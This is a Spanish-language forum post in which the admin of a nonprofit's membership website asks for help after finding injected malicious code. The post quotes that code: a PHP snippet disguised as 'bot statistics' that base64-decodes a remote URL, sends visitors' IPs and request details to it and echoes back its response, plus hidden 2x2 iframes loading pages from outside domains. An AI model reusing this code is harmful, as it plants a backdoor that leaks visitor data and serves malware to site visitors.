Buenas...
Resulta que tengo hecho un sistema de control de una asociacion civil sin fines de lucro para el control de sus miembros y todo funciona de maravilla pero de unos dias para aqui se han recibido ataques de insercion de codigo malisioso en las paginas de tipo html y en algunas php que tienen codigo fijo.
el sitio esta dividido en dos partes el portal principal que no tiene codigo php ejecutable, mas que la deteccion del tipo de navegador ya sea para pc normal o si es un telefono movil,
y la segunda que esta en un subdominio que es en donde funciona el sistema de control con bases de datos y control de usuarios, etc.
eh revisado las bases de datos y aparentemente estan limpias de codigo intruso
y los archivos php que tienen sessiones y condiciones asi como verificacion de codigo parecen estar limpios, no obstante las paginas .html del mismo subdominio si estan afectadas...
el codigo que descubri en el index es este:
Código PHP:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
ahora los codigos que se insertan en las paginas es este:
Código PHP:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sampaointl.com/mzaf.html></iframe>');
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awad.html?i=698271></iframe>
Alguien que me ayude a darle explicacion porque no entiendo como es posible que puedan insertar si no tengo formularios hacia publico
y donde los tengo los filtro asi:
Código PHP:
$usNick=strtoupper(trim(strip_tags(stripslashes(htmlentities($_POST[usNick])))));
$usCon=trim(strip_tags(stripslashes(htmlentities($_POST[usCon]))));
mas validacion que sea exactos y que existan... y recalco la base de datos estan limpias de codigo... que puede ser??
¿puede ser el hosting el que esta infectado de virus?
por cierto que es un hosting de pago, NO es gratuito...
de antemano muchas gracias por su ayuda....
Saludos!!